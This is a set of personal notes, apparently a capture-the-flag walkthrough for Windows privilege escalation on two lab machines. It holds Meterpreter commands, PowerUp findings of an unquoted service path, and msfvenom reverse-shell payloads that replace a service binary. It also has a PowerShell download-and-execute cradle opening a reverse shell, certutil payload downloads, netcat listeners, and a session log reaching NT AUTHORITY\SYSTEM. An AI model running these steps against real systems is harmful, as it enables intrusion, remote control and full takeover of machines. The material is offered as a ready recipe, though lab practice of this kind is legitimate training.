windows priv esc

1> sysinfo

2> getuid

3> getprivs

---

---

powerspoloit or winpeas .......

mkdir temp && cd temp

on local machine just download the winpeas or powersploit and then upload the file into the shell by follwoing commad

upload ~/Desktop/file name

4> load powershell

5> powershell_shell

after this ps (that is powershell , just do . .\Powerup.ps1

then run Invoke-AllChecks

6> after this we got to know about some (canrestart = true ) and we can see the service name there !!!!!

7> meterpreter > shell --> this will open the shell

8> stop the service we saw in the last

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

so we got that vulnerbility there , with service name AdvancedSystemCareService9 (canrestart)

after this what we can do is just make a payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=TUN0(OWN IP) LPORT=1243 -e x86/shikta_na_gai -f exe > ASCService.exe 

aftert making this payload

then in meterpreter shell just use command

upload ~/ASCService.exe 

this will give an error as this service is running already

so SOLITION is

meterpreter> shell

now we are insite shell and type > sc stop AdvancedSystemCareService9

after this just use previous command to upload the file the file will be uploaded

---

---

NOW OPEN A NEW MSFCONSOLE JUST TO TRIGGER THE REVERSE SHELL AS ROOT THAT WE MADE USING THE MSFVENOM

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.201.110.68:1243 
bash
pwd
[*] Sending stage (177734 bytes) to 10.201.125.201
[*] Meterpreter session 1 opened (10.201.110.68:1243 -> 10.201.125.201:49275) at 2025-11-06 08:49:10 +0000

meterpreter > bash
[-] Unknown command: bash. Run the help command for more details.
meterpreter > pwd
C:\Windows\system32
meterpreter > run post/windows
[*] 10.201.125.201 - Meterpreter session 1 closed.  Reason: Died
Interrupt: use the 'exit' command to quit
meterpreter > run post/windows/manage/migrate
[-] Msf::OptionValidateError The following options failed to validate: SESSION.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.201.110.68:1243 
[*] Sending stage (177734 bytes) to 10.201.125.201
[*] Meterpreter session 2 opened (10.201.110.68:1243 -> 10.201.125.201:49278) at 2025-11-06 08:51:47 +0000

meterpreter > run post/windows/manage/migrate
[*] Running module against STEELMOUNTAIN
[*] Current server process: ASCService.exe (1392)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 2992
[+] Successfully migrated into process 2992
meterpreter > sysinfo
Computer        : STEELMOUNTAIN
OS              : Windows Server 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > cd C:\\
meterpreter > cd Users
meterpreter > cd Administrator\\
meterpreter > cd Desktop\\
meterpreter > type root.txt
[-] Unknown command: type. Run the help command for more details.
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  1528  fil   2020-10-12 20:05:50 +0100  activation.ps1
100666/rw-rw-rw-  282   fil   2019-09-26 15:11:25 +0100  desktop.ini
100666/rw-rw-rw-  32    fil   2019-09-27 13:41:10 +0100  root.txt

meterpreter > cat root.txt
9af5f314f57607c00fd09803a587db80meterpreter > 

USE MULTI/HANDLER
SET LHOST
SET LPORT (USE THE PORT THAT WE USED WHILE CREATING THE MSFPAYLOAD USING THE MSFVENOM 

AND IMMIDIATLY GO TO THE SHELL AND START THE ADVANCESERVICE AGAIN

sc start AdvancedSystemCareService9

and you got a shell but this will no longer be maintained there

so immidiatly type on meterpreter

meterpreter> run post/windows/manage/migrate

and boom you got a root shell and good to go with root.txt

---

---

---

---

alfered best windows concept machine

1>

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

uplaod the above into the testing space

2> before running above , open , python3 -m http.server 8000 or 80 and then open

Invoke-PowerShellTcp.ps1 donlwoad this file and then open a 8000 server ,,,,,,

netcat listner , nc -nvlp 4444

3>after this we got shell just we have to go for privlage acess

create a payload for getting a root shell

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=IP LPORT=PORT -f exe -o shell-name.exe

4> just copy this shell-name.exe into the shell we gained for user

certutil -urlcache -f http://10.10.145.96:8000/reverse_shell.exe reverse_shell.exe

the above command will copy it into the shell and good to go

OR

powershell "(New-Object System.Net.WebClient).Downloadfile('http://your-thm-ip:8000/shell-name.exe','shell-name.exe')"

5> Start-Process "shell-name.exe"

we have to start the process ...........

so the concept is we have to analyse the process gonig on here as , i can see that in previous we stopped a service and then started as that process was already running , but in this we have to do the same as the processs is different .,.,.,

6> open msfconsole

use multi/handler

set lhost and lport , that we put during the preparation of payload through msfvenom

7> whoami /priv --> this command will show you the right path for ----------

8>do watch the command ..., C:\Windows\System32\config